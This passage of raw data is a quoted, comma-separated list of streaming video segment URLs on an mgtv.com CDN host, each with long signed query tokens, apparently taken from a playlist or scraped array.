Iu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/3646981744F24F690E6D3C48C3FCC421_580080_590080_1744_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~F
jSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8EC7C7E3B083433D68E937F09D077442_590080_600080_935_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7BFDD41C40E3C64FDF002442CF2D3471_600080_610080_651_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/F11B9A5B320441ABC9D68F49084F4CE0_610080_620080_1442_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0C
yKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/12968A8FA948DA6F828F01B1B42B1690_620080_630080_2588_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FB2EF1C71C843E6ADF24E29B3553D14E_630080_640080_1239_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmg
Y7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8EE3A4A0EA0557CDF71A62AF96659A26_640080_650080_862_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/4A5DE40514DC4F9EBEEE0C3FCA5AEE9F_650080_660080_1467_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/14BCEC6B59C772B7921E59D83CBCADB2_660080_670080_1018_v02_mp4.ts?arange=0&pm=WD~Uy
erotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/ADAD8F30A10FEFFA0DE165ECA74F985A_670080_680080_1554_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/8838B2A3490536B41908C70F68A2B00B_680080_690080_1146_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3X
MXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/D4C1E15399EDF167D0DE03C4CB4E8674_690080_700080_783_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/0A0BAC7494970E9F7A276928F150752C_700080_710080_1197_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/FD2FC349430796DDAD4BA24FB09C53AA_710080_720080_1086_v02_mp4.t
s?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/A4B39FF7EE06E5F83F4E4CCD8243854B_720080_730080_946_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E5941EC8EB99122FF2A906E67CDEFCDF_730080_740080_1226_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWef
bbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/57808D989E8A303086993E5B48A7758D_740080_750080_1556_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/E28DF7E3120E708B72AC406657F3BB02_750080_760080_1418_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/DBC4ADB670A949211D71F9C9B7678D16_760080_77
0080_1006_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/7CA08B0A45E7F580255715E19DA8877C_770080_780080_1019_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B3QKPxgsCDQLvcr~rxWefbbGWxUdCo2plshiT3XMXFIeSb~aBagDt1wVmgY7pdIx9u1ybdalid~FjSQz6zFlUH1MJxCewGykE12RYna_G1&vcdn=0&scid=25117&ruid=8b3aaf24c77d41e1&UYs5cp=hpmMlJaPwsvZhpmNmo6Wm8K-so-sm5a50s6-nZ22vqm-vrfZhpmLlpKaws7JzMbMycfIz8rMycfZhpmcm5GQj4vCzw~~<id=db16dd5a9f3f9b3","https://sluiceyf.titan.mgtv.com/c1/2021/05/29_0/D6C015A2AC49503BB1C96C0EF22EFDA2_20210529_1_1_1025_mp4/CA63F37FFB93B4FC2A12DC937444A7D2_780080_790080_1149_v02_mp4.ts?arange=0&pm=WD~Uyerotnyehr0JyWXzqQ0CyKTBkDI0Os_efUSUslSHPFVbywZix33~6CE0xxVfgUvURRdhrBBBJoDPb75TVGDR3jtNbj0G~m6lcdYbJ98TEazWqfqqTtZfcaZaxvUOJwiJNQpxQ~Rb18fGhxJSpaYxCdFC5oaygq80vVYBQW1VR~FZJvqR~_a9PE4zBlTg9EivwBR3bjdcN7mRW4mxvv5JGMphu7uq1zzroePxf_QyW9WfMZ2PrbXQflnbUkhE4fM~QX7OaBJcLcfBtDOQELAFtkJ_ehC5eOIu~2GpQR~9FrIBi9XW6S9aN9g3bbwRsUyVMVAKN21tGFir4w113XwH_gpzP1xvyGz8j9B
